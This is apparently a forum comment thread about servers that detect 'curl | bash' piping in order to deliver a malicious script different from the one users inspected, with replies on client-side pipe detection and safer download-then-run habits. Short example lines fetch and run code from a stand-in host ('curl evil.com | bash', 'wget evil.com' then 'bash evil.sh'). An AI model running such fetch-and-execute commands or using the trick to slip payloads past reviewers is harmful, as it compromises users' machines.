zlacker

[parent] [thread] 7 comments
1. kazina+(OP)[view] [source] 2018-07-29 04:04:26
You could just have the script detect that its stdin is a pipe. E.g., Linux specific:

  $ echo 'ls -l /proc/$$/fd/0' | bash
  lr-x------ 1 kaz kaz 64 Jul 28 21:03 /proc/23814/fd/0 -> pipe:[4307360]
Here, our script consists of the ls command; it shows that when we pipe it to bash, it finds fd0 to be a pipe.

We can make some code conditional on this to produce a "don't run this script from a pipe" diagnostic.

This is superior to the dodgy, delay-based server side detection because it is reliable.

Also, it still works when someone does this:

  $ curl <url> > file
  $ cat file | bash
Of course, no protection for

  $ bash file
replies(1): >>ericpa+y
2. ericpa+y[view] [source] 2018-07-29 04:20:02
>>kazina+(OP)
This logic would be detectable to a user who reads the script. The goal here is to trick users who first inspect the script and then `curl | bash`
replies(1): >>nerdpo+X
◧◩
3. nerdpo+X[view] [source] [discussion] 2018-07-29 04:27:27
>>ericpa+y
If you downloaded the script to inspect it, why would you not just run the script that you downloaded?
replies(4): >>jchw+61 >>chmod7+t6 >>tutfbh+oc >>IshKeb+Hc
◧◩◪
4. jchw+61[view] [source] [discussion] 2018-07-29 04:30:49
>>nerdpo+X
Web browser.
◧◩◪
5. chmod7+t6[view] [source] [discussion] 2018-07-29 06:44:54
>>nerdpo+X 

    curl evil.com
    curl evil.com | bash
replies(1): >>nerdpo+Rp
◧◩◪
6. tutfbh+oc[view] [source] [discussion] 2018-07-29 09:22:40
>>nerdpo+X
That's the point. It's also possible that the remote script has been altered in the meantime. Therefore it's never advisable to download the script again after inspection.
◧◩◪
7. IshKeb+Hc[view] [source] [discussion] 2018-07-29 09:28:04
>>nerdpo+X
There's more than one user. You don't want any of them to find the malicious code.
◧◩◪◨
8. nerdpo+Rp[view] [source] [discussion] 2018-07-29 13:38:40
>>chmod7+t6 

    wget evil.com
    less evil.sh
    bash evil.sh
[go to top]